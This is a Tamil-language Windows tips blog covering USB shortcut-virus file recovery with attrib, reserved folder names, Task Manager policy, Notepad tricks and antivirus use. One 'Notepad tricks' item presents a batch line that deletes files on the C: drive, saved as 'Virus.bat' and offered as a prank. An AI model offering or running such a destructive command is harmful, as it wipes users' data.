Saturday, 27 February 2016

வைரஸ் தாக்கிய Pen drive ல் இருந்து பைல்களை மீட்டெடுக்க



தற்பொழுது தகவல்களை சேமிக்க பயன் படுத்தப்படுவது USB பென்டிரைவ்கள். இதில் முக்கிய மான பிரச்சினை வைரஸ் பிரச்சினை வெவ்வேறான கணினிகளில் உபயோகிப்பதால் வைரஸ்கள் சுலபமாக பென்டிரைவில் புகுந்து உள்ளே இருக்கும் பைல்களை பாதிக்கிறது. இப்படி பாதிக்கும் பொழுது உங்கள் பென்ட்ரைவில் உள்ள பைல்கள் மறைக்க பட்டுவிடும் கணினியில் பென்டிரைவை ஓபன் செய்தால் எந்த பைல்களும் இருக்காது காலியாக இருக்கும் ஆனால் properties சென்று பார்த்தால்பைல்கள் இருப்பது போன்றே அளவு காட்டும். காரணம் நம் தகவல்களை வைரஸ்கள் மறைத்து வைத்துவிட்டது. பென்டிரைவில் முக்கியமான தகவல்  ஏதும் இல்லை எனில் Format செய்து பென்டிரைவை திரும்ப பெறலாம். ஆனால் ஏதேனும் முக்கிய மான தகவல்கள் இருந்தால் எப்படி அந்த பைல்களை பத்திரமாக மீண்டும் கொண்டு வருவது என பார்ப்போம்.

இதற்கு நீங்கள் எந்த மென்பொருளையும் உங்கள் கணினியில் இன்ஸ்டால் செய்து உபயோகிக்க வேண்டியதில்லை.உங்கள் கணினியிலேயே சுலபமாக செய்து விடலாம். கீழே உள்ள வழிமுறையின் படி கவனமாக செய்து அந்த பைல்களை மீட்டு எடுக்கலாம்.

1) முதலில் பென்டிரைவை உங்கள் கணினியில் சொருகி கொள்ளுங்கள்.
 
2) Start ==> Run ==> CMD ==> Enterகொடுக்கவும்.
 
3) இப்பொழுது பென்ட்ரைவ் எந்த ட்ரைவில் உள்ளது என பாருங்கள். My Computer செல்வதன் மூலம் கண்டறியலாம்.
 
4) உதாரணமாக E: டிரைவில் பென்ட்ரைவ் இருக்கிறது என வைத்து கொள்வோம் அதற்க்கு நீங்கள் E: என கொடுத்து Enter அழுத்தவும்.

5) attrib -s -h /s /d *.* என டைப் செய்யுங்கள் ஒவ்வொரு பகுதிக்கும் Space சரியாக கொடுக்கவும். உதவிக்கு கீழே உள்ள படத்தை பார்க்கவும் உங்களின் விண்டோ இது போல இருக்க வேண்டும்.

  • நீங்கள் சரியாக கொடுத்து உள்ளீர்கள் என உறுதி செய்து கொண்டு Enter அழுத்துங்கள்.
  • சில வினாடிகள் பொறுத்திருங்கள். இப்பொழுது உங்கள் பென்ட்ரைவ் சோதித்து பாருங்கள் உங்களுடைய பைல்கள் அனைத்தும் திரும்பவும் வந்திருக்கும்.

NovaPDF Lite 8 இலவச Licence Key



Word documents, Excel sheets, PowerPoint presentations, AutoCad drawings, E-mails, மற்றும் Web pages போன்றவைகளை அவற்றின் தரத்தில் எவ்வித மாற்றமும் ஏற்படாதவாறு PDF கோப்புக்களாக மாற்றிக்கொள்வதற்கும் அவற்றினை மிக நேர்த்தியாக நகல் (Print) எடுப்பதற்கும் NovaPDF Lite எனும் மென்பொருள் துணைபுரிகிறது.

NovaPDF Lite 8 எனும் இந்த மென்பொருளானது $19.99 பெறுமதியான கட்டணத்தை செலுத்தி பெறவேண்டிய மென்பொருளாகும். இருப்பினும் கீழுள்ள இணைப்பை சுட்டுவதன் மூலம் பெறப்படும் இணையப்பக்கத்தில் உங்கள் பெயர் மற்றும் மின்னஞ்சல் முகவரிகளை உள்ளிட்டு Get Free Licence என்பதனை அழுத்துவதன் மூலம் இலவச Licence Key ஐ உங்கள் மின்னஞ்சல் முகவரிக்கு பெற்றுக்கொள்ளலாம்.

இதனை தரவிறக்க கீழுள்ள இணைப்பை சுட்டுக.
====> NovaPDF-Lite-8
இலவச Licence Key ஐ பெற கீழுள்ள இணைப்பை சுட்டுக.
====> Free-Licence-Key_Tamilinfotech
.
.
.
.
.
தொடர்ச்சியாக Like, Comment, Share, Tag செய்வதன் மூலம் எமது ஒவ்வொரு பதிவையும் தவறாமல் உங்கள் News Feed இல் பெற்றுக்கொள்ளலாம்.

Friday, 19 February 2016

Con பொன்ற உருவாக்க முடியாத பெயர்களில் Folder உருவாக்குவதற்கான முயற்சி

நாம் கனினியில் பொதுவாக DATA, File களை Folder யினுள் சேமிப்பது வழக்கம். ஆனால் CON, PRN, NUL, COM1, COM2, COM3, LPT1, LPT2, LPT3, etc…  இது போன்ற பெயர்களில் Folder களை உருவாக்குவது கடினம் முடிந்தால் முயற்சித்துப் பருங்கள். 
ஏன் இந்த பெயரில் Folder கள் உருவகாததற்கு காரணம் இது அனைத்தும் Device Name ஆகும். இதனை உருவாக்க சில வலிகள் உண்டு.

Method One: - 

Create CON Folder
Rename Folder
Type Folder Name
Number Lock Off (Num Lock)
Press Alt + 255

Method Two :-
Create CON Folder
Rename Folder
Type Folder Name
Number Lock Off (Num Lock)
Press Alt + 0160

Method Three: - 
Open CMD Command
Type “MD\\.\\C:\\Con”
 

வைரஸ்களால் மறைந்து போன கோப்புகளை யுஎஸ்பி மற்றும் வன்வட்டிலிருந்து மீட்டெடுக்க

கணினிகளுக்கிடைய தரவுகளை பரிமாற்றம் செய்ய நாம் யுஎஸ்பி ட்ரைவினை அதிகம் பயன்படுத்துவோம். அவ்வாறு ஒரு கணினியில் இருந்து கோப்புகளை வேறொரு கணினிக்கு மாற்றம் செய்யும் போது யுஎஸ்பி ட்ரைவில் உள்ள கோப்பறைகள் யாவும் ஸ்டார்கட் கோப்பாக மாறி இருக்கும். ஆனால் நம்முடைய கோப்புகள் கோப்புகள் யாவும் அந்த யுஎஸ்பி பெண்ட்ரைவில் இருக்கும். ஆனால் அதனை திறந்தால் ஸ்டார்கட்டாக மட்டுமே இருக்கும். இது வைரஸ் பாதிப்பால் ஏற்படும். இந்த ஸ்டார்கட் கோப்பினை திறந்தால் நம்முடைய கோப்புகள் இருக்கும். ஆனால் அவ்வாறு செய்யும் போது நம்முடைய கணினிக்கும் அந்த ஸ்டார்கட் வைரஸ் வந்துவிடும். இந்த ஸ்டார்ட்கட் வைரஸால் நம் கணினிக்கு எந்த வித பாதிப்பும் வராமலும் , கோப்புகளுக்கு எந்த வித சேதாரம் இல்லாமலும் மீட்டெடுக்க முடியும். 
இதனை நாம் எந்த வித மென்பொருள் துணையும் இன்றி விண்டோஸ் இயங்குதளத்தின் உதவியுடன் செய்ய முடியும்.




ஸ்டார்கட் வைரஸ் பாதிக்கப்பட்ட பின் இது போல் ட்ரைவுகள் காட்சியளிக்கும்.  பாதிக்கப்பட்ட யுஎஸ்பி ட்ரைவினை கணினியில் பொறுத்திவிட்டு, பின் மைகம்ப்யூட்டரை ஒப்பன் செய்து எந்த ட்ரைவ் என குறித்துவைத்துக்கொள்ளவும். 
பின் கமான்ட் பிராம்டை ஒப்பன் செய்யவும். விண்டோஸ்கீ மற்றும் R பொத்தான்களை ஒரு சேர அழுத்தவும். தோன்றும் விண்டோவில் CMD என்று தட்டச்சு OK பொத்தானை அழுத்தவும். 


பின் தோன்றும் விண்டோவில் cd\ என்று உள்ளிடவும்.
அடுத்து எந்த ட்ரைவோ அந்த ட்ரைவினை உள்ளிட்டு என்டர் பொத்தானை அழுத்தவும். நான் E: என்று குறிப்பிட்டுள்ளேன். எனவே e: என்று உள்ளிட்டு என்டர் பொத்தானை அழுத்தவும். உங்களுடைய ட்ரைவ் மாறுபடும்.
அடுத்து dir/ah என்று உள்ளிட்டு பின் என்டர் பொத்தானை அழுத்தவும். தற்போது அந்த ட்ரைவில் உள்ள கோப்புகள் பட்டியலிடப்படும்.
அடுத்து attrib *. -h -s /s /d என்று உள்ளிட்டு பின் என்டர் பொத்தானை அழுத்தவும். என்டர் பொத்தானை அழுத்தியவுடன் கோப்புகளை தனியே பிரிக்கும் வேலை ஆரம்பம் ஆகும். 
இறுதியாக exit என்று உள்ளிட்டு பின் என்டர் பொத்தானை அழுத்தவும். தற்போது காமான்ட் பிராம்ப்ட் மூடப்படும்.
இப்போது உங்களுடைய யுஎஸ்பி ட்ரைவினை திறந்து பார்க்கவும். அப்போது உங்களுடைய கோப்புகள் அந்த ஸ்டார்கட் கோப்பு வைரஸ்களிடம் இருந்து தனியே பிரிக்கப்பட்டிருக்கும். அதனை நீங்கள் எடுத்து பயன்படுத்திக்கொள்ள முடியும்.
இந்த முறையானது ட்ரைவில் உள்ள அனைத்து கோப்புகளையும் தனியே பிரித்தெடுக்க முடியும்.இதே முறையை பயன்படுத்தி குறிப்பிட்ட ஒரு கோப்பினை மட்டும் பிரித்தெடுக்க முடியும். அதற்கு attrib கமெண்ட் உள்ளிடும் போது கோப்பின் பெயரையும் சேர்த்து உள்ளிட்டால் போதுமானது. tcinfo.psd என்னும் போட்டோசாப் பைலை மட்டும் ட்ரைவில் இருந்து தனியே மீட்டெடுக்க வேண்டுமெனில்  attrib tcinfo.psd -r -a -s -h என்று உள்ளிடவும். இப்போது நீங்கள் குறிப்பிட்ட கோப்பு ட்ரைவில் இருக்கும் பட்சத்தில் கோப்பானது மீட்டெடுக்கப்படும்.

விண்டோஸ் இயங்குதளத்தில் டாஸ்க் மேனேஜரை எனேபிள் மற்றும் டிசேபிள் செய்ய

விண்டோஸ் இயங்குதளத்தின் வேகம் சற்று முடக்கப்படும் போது டாஸ்க் மேனேஜரை திறந்து திறந்திருக்கும் தேவையற்ற அப்ளிகேஷன்களை மூடுவோம் இதனால் இயங்குதளம் சற்று வேகமாக செயல்படும், கணினி மிக மோசமான மந்த நிலைக்கு தள்ளப்படும் போது அனைத்து கணினி பயன்பாட்டாளர்களும் செல்லும் இடம் டாஸ்க் மேனேஜர் ஆகும். இந்த டாஸ்க் மேனேஜரை பயனர் விருப்பபடி மாற்றியமைத்துக்கொள்ள முடியும். 
Ctrl+Alt+Delete பொத்தான்களை ஒரு சேர அழுத்தி டாஸ்க் மேனேஜரை திறக்கலாம், இல்லையெனில் Ctrl +Shift+Esc பொத்தான்களை ஒரு சேர அழுத்தியும் டாஸ்க் மேனேஜரை திறக்க முடியும். இதனை ஒப்பன் ஆகாமல் தடுக்கவும் வழி உள்ளது அதுவும் மூன்றாம் தர மென்பொருள் உதவி இல்லாமல், விண்டோஸ் இயங்குதளத்தின் உதவியுடன் செய்ய முடியும். 
டாஸ்க் மேனேஜரை ஒப்பன் ஆகாமல் தடுக்க முதலில் விண்டோஸ் கீ மற்றும் R பொத்தான்களை ஒருசேர அழுத்தி தோன்றும் விண்டோவில் gpedit.msc என்று உள்ளிட்டு பின் OK பொத்தானை அழுத்தவும். 


தோன்றும் விண்டோவில் கீழ்காணும் வரிசைப்படி திறக்கவும். User Configuration >Administrative Templates >System >Ctrl+Alt+Del Options கிளிக் செய்யவும். வலதுபுறம் தோன்றும் விண்டோவில் Remove Task Manager என்னும் தேர்வினை சுட்டியினால் இரட்டை கிளிக் செய்யவும். இல்லையெனில் ரைட் கிளிக் செய்து தோன்றும் விண்டோவில் Edit தேர்வினை கிளிக் செய்யவும்.


அடுத்ததாக தோன்றும் விண்டோவில் Enabled என்னும் ஆப்ஷன் பொத்தானை தேர்வு செய்து பின் OK பொத்தானை அழுத்தவும்.


இப்போது டாஸ்க் மேனேஜரை திறந்து பாருங்கள் திறக்க முடியாது, மீண்டும் டாஸ்க் மேனேஜரை திறக்க வேண்டுமெனில் Disabled ஆப்ஷன் பொத்தானை தேர்வு செய்து பின் Ok பொத்தானை அழுத்தவும்.

Notebad ல் செய்யக்கூடிய TOP 5 டிப்ஸ் ...

1.Flight விபத்து அதனால் ஏற்படும் அபாயம் குறிக்கும் எழுத்துக்கள்:
world trade center trick
● Notebad ல் சென்று Q33N என டைப் செய்யவும் 
●பிறகு Format சென்று Font என்பதை தேர்வு செய்யவும்.
●Font Wingdings மற்றும் Size 72 தேர்வு செய்து கொள்ளுங்கள்
●தோன்றும் Tricks ஐ காணலாம்.





2.மேட்ரிக்ஸ் மாதிரி அமைப்பைக் காண:
matrix effect trick●Notebad ல்சென்று பின்வரும் கோடினை காபி செய்து பேஸ்ட் செய்யுங்கள்.



@echo off 
color 02 :start echo %random% %random% %random% %random% %random% 
%random% %random% %random% %random% %random% goto start - See more at: 
http://www.coolhackingtrick.com/2013/01/top-5-cool-notepad-tricks.html#sthash.sdEZPcqS.dpuf


●இதனை tamilcream.bat என Save செய்யுங்கள்.
●பின்பு Open செய்யுங்கள் Matrix Effect தோன்றும்.
3.வைரசினை உருவாக்க வேண்டுமா?:
●Notebad ல்சென்று பின்வரும் கோடினை காபி செய்து பேஸ்ட் செய்யுங்கள்

@Echo off Del C:\ *.* |y


●பிறகு Virus.bat என Save செய்து கொள்ளுங்கள்.
4.தேதி மற்றும் நேரம் ஆகியவற்றை Notebad ல் காண:
● Notebad ல் சென்று .LOG என டைப் செய்து கொள்ளுங்கள்.
●பிறகு அதனை Open செய்து பாருங்கள். தேதி மற்றும் நேரம் தோன்றும்.
5.உங்கள் கணினி Lights அழகாக தோன்ற:
●Notebad ல்சென்று பின்வரும் கோடினை காபி செய்து பேஸ்ட் செய்யுங்கள்

Set wshShell
 =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 
wshshell.sendkeys "{CAPSLOCK}" wshshell.sendkeys "{NUMLOCK}" 
wshshell.sendkeys "{SCROLLLOCK}" loop - See more at: 
http://www.coolhackingtrick.com/2013/01/top-5-cool-notepad-tricks.html#sthash.sdEZPcqS.dpuf


●பிறகு அதனை dance.vbs என Save செய்து Open செய்யுங்கள்.

Saturday, 13 February 2016

மென்பொருள்களை பாதுகாக்க Password கொடுப்பது எப்படி?

உங்கள் கம்ப்யூட்டரில் பல மென்பொருள்களை வைத்திருப்பீர்கள். அவற்றில் சில மென்பொருள்களை பிறர் உபயோகிக்காமல் இருக்க Password கொடுக்க நினைப்பீர்கள். அவ்வாறு செய்ய விரும்புவோர்க்கான பதிவு. இதற்கு Password Door என்ற மென்பொருள் பயன்படுகிறது. இதனைப் பற்றி விரிவாகக் காண்போம்...

செய்முறைகள்:
● முதலில் இந்த மென்பொருளை Download செய்து கொள்ள Click here
●இந்த மென்பொருளை Download செய்த பிறகு Install கொடுத்தவுடன் Next என்பதை தேர்வு செய்யவும்.
● பிறகு Enter Admin Password என்ற கட்டத்தில் உங்களது Password ஐ உள்ளிடவும்
●பிறகு Confirm Admin Password என்ற கட்டத்தில் மீண்டும் Password ஐ உள்ளிட்டு Install செய்யவும். \
● பிறகு உங்கள் மெனுவில் இந்த Password Door ஐ தெர்வு செய்து Password 
கொடுத்து OK அழுத்தவும்.
● பிறகு Protect a Program என்பதில் அழுத்தவும்.
●இப்பொழுது நீங்கள் Install செய்திருக்கும் அனைத்து மென்பொருள்களின் பெயர்களும் தோன்றும் .
● நீங்கள் Lock செய்ய விரும்பும் மென்பொருளை தேர்ந்தெடுத்து கீழெ உள்ள Protect என்பதை தெர்வு செய்யவும்.
● பிறகு உங்களது மென்பொருள் பெயர் தோன்றியவுடன் OK கொடுக்கவும்.
● இதேபோல் விடுவிக்க Password Door ல் சென்று விடுவிக்க வேண்டிய மென்பொருளை தேர்வு செய்து Remove என்பதை அழுத்தவும்

Saturday, 6 February 2016

வைரஸ் புரோகிராமை பயன்படுத்துவது எப்படி? - how to use virus program in tamil



ஆண்டி வைரஸ் புரோகிராம் பதிந்து வைத்திருக்கும் பலர் திடீரென என் ஆண்டி வைரஸ் புரோகிராமினையும் மீறி சில வைரஸ்கள் வந்து என் பொழைப்பையே கெடுத்துருச்சே! என்று அங்கலாய்ப்பார்கள். இந்த ஆண்டி வைரஸ் புரோகிராம்களே இப்படித்தான். வைரஸ்களை எதிர்த்து திடீரென வேலை செய்யாது என்று புலம்புவார்கள். நப்பாசையில் ஆண்டி வைரஸ் புரோகிராமினைப் பயன்படுத்தி ஸ்கேன் ஓடவிட்டுப் பார்ப்பார்கள். 

எந்த வைரஸும் இல்லை என்று செய்தி வந்தவுடன் நம் தலைவிதி 
அவ்வளவுதான் என்று கூறி டெக்னீஷியன் மூலம் வைரஸ்களைக் காலி செய்வார்கள் அல்லது இந்த புரோகிராம் சரியில்லை என்று வேறு ஒரு ஆண்டி வைரஸ் புரோகிராமிற்குத் தாவுவார்கள். இது எதனால் ஏற்படுகிறது? என்று சற்றுப் பார்ப்போம். நீங்கள் என்ன செய்கிறீர்கள். நீங்களே அல்லது யார் மூலமாவது ஒரு ஆண்டி வைரஸ் புரோகிராமினை இன்ஸ்டால் செய்கிறீர்கள். அதுவும் அவ்வப்போது நீங்கள் இன்டர்நெட்டில் உலா வருகையில், இமெயில் இறக்குகையில், பிளாஷ் டிரைவ் பயன்படுத்துகையில் சிகப்பு கட்டத்தைக் காட்டி இதில் வைரஸ் இருந்தது. நான் கிளீன் செய்துவிட்டேன் என்று காட்டுகிறது. உங்களுக்கு சந்தோஷமோ சந்தோஷம்.

ஆனால் சிறிது நாட்கள் கழித்து கம்ப்யூட்டரில் வைரஸ் இருக்கிறது என்று தெரிகிறது. அப்போது தான் முதல் பத்தியில் சொல்லப்பட்ட நிலைக்கு நீங்கள் தள்ளப்படுகிறீர்கள். இங்கு நீங்கள் செய்யத் தவறிய சில செயல்களையும் அதற்கான பரிகாரங்களையும் பார்ப்போம். 

1. ஆண்டி வைரஸ் புரோகிராமினை இன்ஸ்டால் செய்தவுடன் அதை மறந்துவிடக் கூடாது. அவ்வப்போது குறிப்பிட்ட கால இடைவெளியில் அதனை அப்டேட் செய்திட வேண்டும். அப்போதுதான் அண்மைக் காலத்தில் வந்த வைரஸ்களைக் கண்டறிவ தற்கான புரோகிராம்கள் டவுண்லோட் செய்யப்பட்டு உங்கள் ஆண்டி வைரஸ் புரோகிராம் மேம்படுத்தப்படும். எனவே நீங்கள் ஸ்கேன் செய்வதாக இருந்தால் முதலில் இன்டர்நெட் இணைப்பு பெற்று உங்கள் ஆண்டி வைரஸ் புரோகிராம் தந்த நிறுவனத்தின் இணைய தளம் சென்று அப்டேட் செய்திடவும். அதன்பின் ஸ்கேன் செய்திடவும்.

2. முதலில் உங்கள் ஆண்டிவைரஸ் புரோகிராமினை எப்படி அமைத்திருக்கிறீர்கள் என்று பார்க்கலாம். வழக்கமாக டாஸ்க் பாரில் வலது ஓரத்தில் இதன் ஐகான் இருக்கும். இதனை டபுள் கிளிக் செய்தால் இந்த புரோகிராம் திறக்கப்படும். ஐகான் இல்லையா? ஸ்டார்ட் கிளிக் செய்து புரோகிராம்ஸ் தேர்ந்தெடுத்தால் கிடைக்கும் பட்டியலில் ஆண்டி வைரஸ் புரோகிராமைக் காணலாம். அங்கு கிளிக் செய்திடலாம்.

3. இது திறந்தவுடன் உங்கள் ஆண்டி வைரஸ் புரோகிராமின் மெயின் பக்கத்தில் நீங்கள் இருப்பதைக் காணலாம். இதில் இந்த புரோகிராமின் அனைத்து செயல்பாடுகளுக்கும் ஏதுவான பிரிவுகள் இருக்கும். அனைத்தையும் பார்த்து ஸ்கேன் செய்வதற்கான பட்டனைத் தேர்ந்தெடுத்து கிளிக் செய்திடவும்.

4. ஸ்கேன் டேபைக் கிளிக் செய்தவுடன் குறிப்பிட்ட டிரைவ் அல்லது அனைத்து டிரைவ்களையுமா எனத் தேர்ந்தெடுக்கும் வசதி கிடைக்கும். அனைத்து டிரைவ்களையும் அல்லது முழு கம்ப்யூட்டரையும் ஸ்கேன் செய்திடும் வசதியினைத் தேர்ந்தெடுக்கவும். உடனே ரிபோர்ட் விண்டோ ஒன்று திறக்கப்படும். ஸ்கேன் முடிந்தவுடன் ஸ்கேன் முடிந்ததாக அறிவிக்கப்பட்டு கண்டறியப்பட்ட வைரஸ்கள், அவை இருந்த பைல்கள், வைரஸ் அழிக்கப்பட்டுவிட்டதா, காப்பு இடத்தில் (குவாரண்டைன்) வைக்கப்பட்டுள்ளதா என்று காட்டப்படும்.

இவற்றை அழிப்பதற்கான ஆப்ஷன் உங்களிடமே விடப்படும். அதே மெயின் விண்டோவிலேயே தொடர்ந்து தானாகக் குறிப்பிட்ட கால அவகாசத்தில் தானாக ஸ்கேன் செய்திடும் பணியை செட் செய்திடவும் வாய்ப்பு தரப்படும். உங்கள் கம்ப்யூட்டர் ஸ்டார்ட் செய்யப்படும் போதெல்லாம் ஸ்கேன் செய்திடும் வகையிலோ அல்லது வாரம் ஒரு முறை மாதம் ஒரு முறையோ ஸ்கேன் செய்திட செட் செய்திடலாம்.

5. ஆட்டோமேடிக் ஸ்கேன் செய்திட எப்படி செட் செய்வது எனப் பார்ப்போம். முதலில் உங்கள் ஆண்டி வைரஸ் புரோகிராமினைத் திறந்து கொள்ளுங்கள். அதன் பின் டூல்ஸ் (Tools) மெனு செல்லுங்கள். Scheduler என்பதைத் தேர்ந்தேடுங்கள். அதன்பின் Schedule Scan என்ற பிரிவிற்குச் செல்லுங்கள். (இந்த சொற்கள் சில ஆண்டி வைரஸ் புரோகிராமில் வேறு மாதிரியாக இருக்கலாம்) ஷெட்யூல் ஸ்கேன் தேர்ந்தெடுத்தவுடன் நியூ என்பதைத் தேர்ந்தெடுங்கள்.

இப்போது சில கேள்விகளுக்கு நீங்கள் பதிலளிக்கும் வகையில் சில ஆப்ஷன்கள் காட்டப்படும். அவை Event Type, When To Do, How Often, Start Time எனப் பலவகைப்படும். இவற்றின் தன்மைக்கேற்ப உங்கள் முடிவுப்படி செட் செய்திடுங்கள். அனைத்தும் முடித்த பின் ஓகே கிளிக் செய்து வெளியேறுங்கள். இதன்பின் நீங்கள் செட் செய்த படி ஸ்கேன் தானாக நடைபெறும். கம்ப்யூட்டர் இயங்கிக் கொண்டிருக்க வேண்டும்.

உங்கள் கம்ப்யூட்டர் வைரஸ் இல்லாமல் இயங்கிட எப்போதும் மேம்படுத்தப்பட்ட உயிர்த்துடிப்புள்ள ஆண்டி வைரஸ் புரோகிராம்களை வைத்திருக்கவும். நீங்கள் மறந்தாலும் அது தானாக இயங்கும்படி செட் செய்திடவும்.

இந்த எழுத்து எங்கு இருக்கும்?

வேர்ட் டாகுமெண்ட்டில் அல்லது பிரசன்டேஷன் ஸ்லைட்களில் வரிசையாக 1,2,3 அல்லது a, b, c என அமைக்கும்போது தானாக இந்த வரிசை எண்கள் அல் லது வரிசையான எழுத்துக் கள் அமைக்கப்படும். ஏதாவது ஒரு இடத்தில் நீங்கள் ஒரு பிரேக் கொடுத்து புதிய வரிசையிலோ அல்லது லைன் ஸ்பேஸ் பிரேக் கொடுத்து அதே வரிசையைத் தொடரவோ திட்டமிடலாம்.

எடுத்துக் காட்டாக
1. Item A
2. Item B
3. Item C
4. Item D
5. Item E
என அமைக்கலாம். இந்த பிரேக் அமைத்திட என்ன செய்கிறீர்கள்? புல்லட் அல்லது நம்பரிங் வசதியை எடுத்துவிட்டு பின் நோக்கிச் சென்று ஒரு லைன் ஸ்பேஸை உருவாக்கிப் பின் மீண்டும் அமைக்கிறீர்கள். எண்கள் தொடர்ந்து வர வேண்டும் என்றால் மீண்டும் அந்த எண்ணுக்கு புல்லட் லிஸ்ட் டைத் தயார் செய்கிறீர்கள்.

தலைவலி தரும் வேலை தானே! இந்த சுற்று வழி தேவையில்லை. இன்னொரு வேகமான வழி உள்ளது. ஷிப்ட் கீயைப் பயன்படுத்துவதுதான். எங்கு இடைவெளி லைன் ஸ்பேஸ் தேவைப்படுகிறதோ அங்கு ஷிப்ட் + என்டர் கீகளை அழுத்தவும். அது அடுத்த வரியை தொடர் எண் அல்லது புல்லட் இல்லாமல் டேட்டாவினை அமைத்திட உதவும். இப்போது மீண்டும் என்டர் கீயை அழுத்துங்கள். ஒரு லைன் ஸ்பேஸ் கொடுத்து மீண்டும் அதே புல்லட் அல்லது தொடர் எண்ணோடு பட்டியல் அமைத்திட வழி கிடைக்கும். எவ்வளவு எளிது என்பதை நீங்கள் வேகமாக இது போன்ற பணிகளில் ஈடுபடும் போதுதான் தெரியும்.

Friday, 5 February 2016

பேஸ்புக்கிலுள்ள புகைப்படங்களை ஒரே கிளிக்கில் தரவிறக்கம் செய்வதற்கு

முன்னணி சமூக வலைத்தளமாக பேஸ்புக்கில் பகிரப்படும் படங்களை கணினியில் தரவிறக்கம் செய்துகொள்வதற்கு பொதுவாக Right Click செய்து Save Image என்பதை தெரிவு செய்யும் முறையே அதிகளவானவர்களால் பயன்படுத்தப்பட்டு வருகின்றது.
எனினும் தற்போது ஒரே ஒரு கிளில் மூலம் படங்களை தரவிறக்கம் செய்வதற்காக நீட்சி ஒன்று அறிமுகப்படுத்தப்பட்டுள்ளது.

கூகுளின் குரோம் உலாவியில் மட்டும் செயற்படக்கூடிய Photo download for Facebook எனும் குறித்த நீட்சியை நிறுவியபின்னர் பேஸ்புக்கில் காணப்படும் எந்தவொரு புகைப்படத்தினையும் இலகுவாக தரவிறக்கம் செய்துகொள்ள முடியும்.
தரவிறக்கச் சுட்டி

எழுத்துபிழையை சரிசெய்ய


தட்டச்சு செய்யும் போது கண்டிப்பாக எழுத்துபிழை ஏற்படும், ஒரு சிலர் அதை கண்டறிந்து சரிசெய்து விடுவார்கள். ஆனால் ஒருசிலரால் தட்டச்சு செய்யும் போது ஏற்படும் பிழையை கண்டறிய முடியாது. இதற்கு காரணம் நாம் அவசரம் அவசரமாக தட்டச்சு செய்வது மட்டுமே ஆகும். இதனை சரி செய்ய நாம் ஏதாவது ஒரு ஸ்பெல்செக் அப்ளிகேஷன் ஒன்றை நம் கணினியில் நிறுவியிருந்தால் தவறாக தட்டச்சு செய்யும் போது நாம் செய்யும் பிழையை சுட்டிகாட்ட ஏதுவாக இருக்கும். எழுத்துபிழையை சரி செய்ய உதவும் மென்பொருள்களில் tinySpell ஒரு இலவச மென்பொருள் ஆகும். இதன் மூலம் எளிமையாக எழுத்துபிழைகளை கண்டறிந்து சரி செய்ய முடியும்.

மென்பொருளை தரவிறக்க சுட்டி 
மென்பொருளை இணையத்தில் இருந்து பதிவிறக்கி கணினியில் நிறுவிக்கொள்ளவும். பின் ஒரு முறை கணினியை மறுதொடக்கம் செய்து கொண்டு பின் இந்த அப்ளிகேஷனை தொடக்கம் செய்து விட்டு, பின் நீங்கள் விண்டோஸ் அப்ளிகேஷன் கொண்டு தட்டச்சு செய்யும் போது பிழை ஏதும் செய்தால் சுட்டிகாட்டி அதை சரி செய்வதற்கான இணைப்பும் கிடைக்கும்.
இந்த tinySpell அனைத்து விண்டோஸ் அப்ளிகேஷன்களிலும் இயங்கும், இது ஒரு இலவச மென்பொருள் ஆகும். பயனர் விருப்பபடி அப்ளிகேஷனை மாற்றியமைத்துக்கொள்ள முடியும். வேண்டிய வார்த்தைகளை இணைத்துக்கொள்ளவும் tinySpell வழிவகை செய்கிறது.

விண்டோஸ் டெஸ்க்டாப்பினை லாக் செய்ய


நாம் அவ்வபோது கணினியில் பணியாற்றிக்கொண்டிருக்கும் போது திடிரென கணினியை விட்டு செல்வோம். அப்போது நம்முடைய கணினியை நண்பர்களோ அல்லது வேறு யாரேனும் நம் கணினியில் உள்ள தகவல்களை பார்த்து விடுவார்களோ என்று நினைத்து நாம் பயம் கொள்வோம். ஏனெனில் நம்முடைய தனிப்பட்ட தகவல்களை அவர்கள் பார்ப்பதால் சில பிரச்சினைகள் எழும். இதனால் நாம் நம்முடைய கணினியை அவசரமாக வெளியே செல்லும் ஒவ்வொரு முறையும் அனைத்து வைக்க வேண்டும். இல்லையெனில் லாக் செய்ய வேண்டும். இதற்கு பதிலாக நம்முடைய கணினியின் டெஸ்க்டாப்பினை லாக் செய்யலாம். இதனால் நம்முடைய கணினியை வேறு எவராலும் அனுக முடியாது.

மென்பொருளை தரவிறக்க சுட்டி

   
மென்பொருளை இணையத்தின் உதவியுடன் பதிவிறக்கி பின் அன்ஜிப் செய்து கொள்ளவும். பின் ScreenBlurஎன்னும் சுருக்குவிசையை பயன்படுத்தி ஒப்பன் செய்யவும். பின் விரும்பிய கடவுச்சொல்லை உள்ளிடவும். பின் Automation டேப்பினை தேர்வு செய்து நம் விருப்பபடி தேர்வுகளை மாற்றியமைத்துக்கொள்ள முடியும். அதேபோன்று Hotkeys டேப்பில் வேண்டிய சுருக்குவிசைகளை ஏற்படுத்திக்கொள்ள முடியும். டெஸ்க்டாப்பினை லாக் செய்ய , டெஸ்க்டாப்பினை மறைக்க சுருக்கு விசைகளை உருவாக்கி கொள்ள முடியும்.
ScreenBlur மென்பொருளை பயன்படுத்தி கணினியை லாக் செய்தவுடன், டெக்ஸ்க்டாப்பில் இதே போன்று தோன்றும். இந்த லாக்கினை விடுவிக்க வேண்டுமெனில் கடவுச்சொல்லை உள்ளிட்டால் மட்டுமே இந்த ScreenBlur லாக்கில் இருந்து வெளியேற முடியும். விண்டோஸ் கீ மற்றும் L கீகளை ஒருசேர அழுத்தி விண்டோஸ் இயங்குதளத்தை லாக் செய்து கொள்ளவும் முடியும்.

Tuesday, 2 February 2016

ஒர்க் ஷீட்டில் வாட்டர் மார்க் - WINDOWS WORKSHEET WATER MARK


ஒர்க் ஷீட் ஒன்றில் அதன் தன்மை பொறுத்து ஏதேனும் பெயர் ஒன்றினை வாட்டர் மார்க்காக அமைக்க விரும்பினால் அதற்கு எக்ஸெல் உதவிடும். எடுத்துக் காட்டாக ஏதேனும் நிறுவன நிதி நிலை குறித்து ஒர்க் ஷீட் ஒன்று தயாரிக்கலாம். 

அதில் “Confidential” என அமைக்க விரும்பலாம். அல்லது நிறுவனப் பெயரினையே அமைக்க விரும்பலாம். இதற்கான செட்டிங்ஸ் வழிகளைப் பார்க்கலாம்.

1.முதலில் ஏதேனும் ஒரு டூல் பாரில் ரைட் கிளிக் செய்து கிடைக்கும் மெனுவில் WordArt என்பதனைத் தேர்ந்தெடுக்கவும். இனி வேர்ட் ஆர்ட் டூல்பாரில் Insert WordArt என்ற ஐகானைத் தேர்ந்தெடுத்து கிளிக் செய்திடவும்.

